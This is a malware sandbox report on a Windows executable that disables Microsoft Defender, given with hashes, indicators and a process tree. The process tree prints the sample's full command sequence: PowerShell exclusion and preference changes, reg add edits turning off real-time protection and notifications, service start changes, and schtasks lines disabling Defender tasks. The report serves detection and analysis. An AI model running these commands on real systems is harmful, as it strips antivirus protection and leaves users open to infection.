Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel
119s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags
arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted
19/03/2024, 02:48
Static task
static1
Behavioral task
behavioral1
Sample
c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe
Resource
win7-20240221-en
General
Target
c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe
Size
91KB
MD5
607acc5a6b670bd144bf3897cda6b233
SHA1
24a2fc93216adb3543ee555473b2f61f333384d2
SHA256
c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8
SHA512
75bd3c2fe2a6b96586e0e1ecf5d282d55f71fb9891961ca1dd6c6be90eaa9a196fd62c8343abfdb039e384895a593f2a01c725451c580980f238c40d764b4643
SSDEEP
1536:r7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfLx4fmSxL2MO2:nq6+ouCpk2mpcWJ0r+QNTBfLyfmSBR
Malware Config
Signatures
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource | yara_rule
behavioral1/files/0x0007000000016412-1.dat | disable_win_def
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Modifies security service 2 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | reg.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid | Process
2160 | powershell.exe
2508 | powershell.exe
2344 | powershell.exe
2932 | powershell.exe
748 | powershell.exe
2184 | powershell.exe
1288 | powershell.exe
2500 | powershell.exe
2992 | powershell.exe
1708 | powershell.exe
1780 | powershell.exe
1988 | powershell.exe
1964 | powershell.exe
588 | powershell.exe
1716 | powershell.exe
832 | powershell.exe
2564 | powershell.exe
Suspicious use of AdjustPrivilegeToken 17 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2160 | powershell.exe
Token: SeDebugPrivilege | 2508 | powershell.exe
Token: SeDebugPrivilege | 2344 | powershell.exe
Token: SeDebugPrivilege | 2932 | powershell.exe
Token: SeDebugPrivilege | 748 | powershell.exe
Token: SeDebugPrivilege | 2184 | powershell.exe
Token: SeDebugPrivilege | 1288 | powershell.exe
Token: SeDebugPrivilege | 2500 | powershell.exe
Token: SeDebugPrivilege | 2992 | powershell.exe
Token: SeDebugPrivilege | 1708 | powershell.exe
Token: SeDebugPrivilege | 1780 | powershell.exe
Token: SeDebugPrivilege | 1988 | powershell.exe
Token: SeDebugPrivilege | 1964 | powershell.exe
Token: SeDebugPrivilege | 588 | powershell.exe
Token: SeDebugPrivilege | 1716 | powershell.exe
Token: SeDebugPrivilege | 832 | powershell.exe
Token: SeDebugPrivilege | 2564 | powershell.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2188 wrote to memory of 2368 | 2188 | c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe | 28
PID 2188 wrote to memory of 2368 | 2188 | c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe | 28
PID 2188 wrote to memory of 2368 | 2188 | c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe | 28
PID 2188 wrote to memory of 2368 | 2188 | c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe | 28
PID 2368 wrote to memory of 2160 | 2368 | cmd.exe | 30
PID 2368 wrote to memory of 2160 | 2368 | cmd.exe | 30
PID 2368 wrote to memory of 2160 | 2368 | cmd.exe | 30
PID 2368 wrote to memory of 2508 | 2368 | cmd.exe | 31
PID 2368 wrote to memory of 2508 | 2368 | cmd.exe | 31
PID 2368 wrote to memory of 2508 | 2368 | cmd.exe | 31
PID 2368 wrote to memory of 2344 | 2368 | cmd.exe | 32
PID 2368 wrote to memory of 2344 | 2368 | cmd.exe | 32
PID 2368 wrote to memory of 2344 | 2368 | cmd.exe | 32
PID 2368 wrote to memory of 2932 | 2368 | cmd.exe | 33
PID 2368 wrote to memory of 2932 | 2368 | cmd.exe | 33
PID 2368 wrote to memory of 2932 | 2368 | cmd.exe | 33
PID 2368 wrote to memory of 748 | 2368 | cmd.exe | 34
PID 2368 wrote to memory of 748 | 2368 | cmd.exe | 34
PID 2368 wrote to memory of 748 | 2368 | cmd.exe | 34
PID 2368 wrote to memory of 2724 | 2368 | cmd.exe | 35
PID 2368 wrote to memory of 2724 | 2368 | cmd.exe | 35
PID 2368 wrote to memory of 2724 | 2368 | cmd.exe | 35
PID 2368 wrote to memory of 2768 | 2368 | cmd.exe | 36
PID 2368 wrote to memory of 2768 | 2368 | cmd.exe | 36
PID 2368 wrote to memory of 2768 | 2368 | cmd.exe | 36
PID 2368 wrote to memory of 2772 | 2368 | cmd.exe | 37
PID 2368 wrote to memory of 2772 | 2368 | cmd.exe | 37
PID 2368 wrote to memory of 2772 | 2368 | cmd.exe | 37
PID 2368 wrote to memory of 2712 | 2368 | cmd.exe | 38
PID 2368 wrote to memory of 2712 | 2368 | cmd.exe | 38
PID 2368 wrote to memory of 2712 | 2368 | cmd.exe | 38
PID 2368 wrote to memory of 2760 | 2368 | cmd.exe | 39
PID 2368 wrote to memory of 2760 | 2368 | cmd.exe | 39
PID 2368 wrote to memory of 2760 | 2368 | cmd.exe | 39
PID 2368 wrote to memory of 1632 | 2368 | cmd.exe | 40
PID 2368 wrote to memory of 1632 | 2368 | cmd.exe | 40
PID 2368 wrote to memory of 1632 | 2368 | cmd.exe | 40
PID 2368 wrote to memory of 2176 | 2368 | cmd.exe | 41
PID 2368 wrote to memory of 2176 | 2368 | cmd.exe | 41
PID 2368 wrote to memory of 2176 | 2368 | cmd.exe | 41
PID 2368 wrote to memory of 1544 | 2368 | cmd.exe | 42
PID 2368 wrote to memory of 1544 | 2368 | cmd.exe | 42
PID 2368 wrote to memory of 1544 | 2368 | cmd.exe | 42
PID 2368 wrote to memory of 2784 | 2368 | cmd.exe | 43
PID 2368 wrote to memory of 2784 | 2368 | cmd.exe | 43
PID 2368 wrote to memory of 2784 | 2368 | cmd.exe | 43
PID 2368 wrote to memory of 2376 | 2368 | cmd.exe | 44
PID 2368 wrote to memory of 2376 | 2368 | cmd.exe | 44
PID 2368 wrote to memory of 2376 | 2368 | cmd.exe | 44
PID 2368 wrote to memory of 620 | 2368 | cmd.exe | 45
PID 2368 wrote to memory of 620 | 2368 | cmd.exe | 45
PID 2368 wrote to memory of 620 | 2368 | cmd.exe | 45
PID 2368 wrote to memory of 1756 | 2368 | cmd.exe | 46
PID 2368 wrote to memory of 1756 | 2368 | cmd.exe | 46
PID 2368 wrote to memory of 1756 | 2368 | cmd.exe | 46
PID 2368 wrote to memory of 1808 | 2368 | cmd.exe | 47
PID 2368 wrote to memory of 1808 | 2368 | cmd.exe | 47
PID 2368 wrote to memory of 1808 | 2368 | cmd.exe | 47
PID 2368 wrote to memory of 1096 | 2368 | cmd.exe | 48
PID 2368 wrote to memory of 1096 | 2368 | cmd.exe | 48
PID 2368 wrote to memory of 1096 | 2368 | cmd.exe | 48
PID 2368 wrote to memory of 784 | 2368 | cmd.exe | 49
PID 2368 wrote to memory of 784 | 2368 | cmd.exe | 49
PID 2368 wrote to memory of 784 | 2368 | cmd.exe | 49
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe
"C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe"
- Suspicious use of WriteProcessMemory
PID:2188

  C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6123.tmp\6124.tmp\6125.bat C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe"
  - Suspicious use of WriteProcessMemory
  PID:2368

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2160

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2508

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2344

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2932

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:748
    C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    PID:2724

    C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    PID:2768

    C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
    PID:2772

    C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    PID:2712

    C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
    PID:2760

    C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
    PID:1632

    C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
    PID:2176

    C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    PID:1544

    C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    PID:2784

    C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    PID:2376

    C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    PID:620

    C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    PID:1756

    C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    PID:1808

    C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    PID:1096

    C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    PID:784

    C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    PID:980

    C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    PID:1536

    C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    PID:1952

    C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    - Modifies security service
    PID:1240
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2184

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1288

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2500

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2992

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1708

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1780

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1988

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1964

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:588

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1716

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:832

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2564
    C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    PID:2444

    C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    PID:2480

    C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    PID:2568

    C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    PID:2632

    C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    PID:2476
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize
3KB
MD5
ad8b6610172ff7b78c52f9ca37f38087
SHA1
9e672aa0385998b41de0eaee280af9372f3b299c
SHA256
582e18cb3c8b2c06080cbb7df73ef27128654a4f201476f457a787cae6b068a4
SHA512
2dd57fab8f54736dfe975b7c5c83de1c864e1f3fe498045f566f58da059be311ca8194c6634df447fbcec9382e3b67c70cc9fbc6a29076accdbcc1c0de829658

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XLMVB888Q2W0O8MROR2K.temp
Filesize
7KB
MD5
278bc18e56ca596317b928641e7e0de0
SHA1
f07147617d84fb443803b330b265ca40c802f200
SHA256
494379f6ed5880bbd7f4e3dc0191c1812ce219cdec0442e28c803de0ecee2204
SHA512
67d9e44ad7f039e22c75c6e4f382885be609625b6005f454dc4fa136e0ca270e38a7b9c803c9b80943595d1d76f63d8a1360e9f540a5a909382f8a98b1e4f09a